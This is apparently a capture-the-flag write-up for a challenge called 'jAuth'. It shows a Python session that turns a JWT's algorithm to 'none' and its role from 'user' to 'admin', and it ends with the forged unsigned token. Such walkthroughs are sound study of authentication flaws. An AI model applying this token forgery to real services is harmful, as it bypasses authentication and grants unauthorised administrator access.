jAuth - HackMD

## creating payload ```shell ┌──(kali㉿kali)-[~/code] └─$ python3 Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import base64 >>> base64.b64decode(b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9') b'{"typ":"JWT","alg":"HS256"}' >>> base64.b64encode(b'{"typ":"JWT","alg":"none"}') b'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=' >>> base64.b64decode(b'eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoidXNlciIsImlhdCI6MTY5MDk0NzgyMn0=') b'{"auth":1690947822387,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36","role":"user","iat":1690947822}' >>> base64.b64encode(b'{"auth":1690947822387,"agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36","role":"admin","iat":1690947822}') b'eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE2OTA5NDc4MjJ9' ``` ### other method: #### https://token.dev/ ![](https://hackmd.io/_uploads/HkwtIUwsn.png) Note that https://jwt.io/ doesn't work, since algorithm can't be set to `none` in it ## payload: **important**: remember to add a dot after the second part!! (as mentioned in Hint: *The JWT should always have **two .** separators.* ) `eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjkwOTQ3ODIyMzg3LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTMuMC41NjcyLjkzIFNhZmFyaS81MzcuMzYiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE2OTA5NDc4MjJ9.` Also, "=" shouldn't be included. It's added only as a complement (padding) in the final process of encoding a message with a special number of characters (More details: https://stackoverflow.com/questions/6916805/why-does-a-base64-encoded-string-have-an-sign-at-the-end)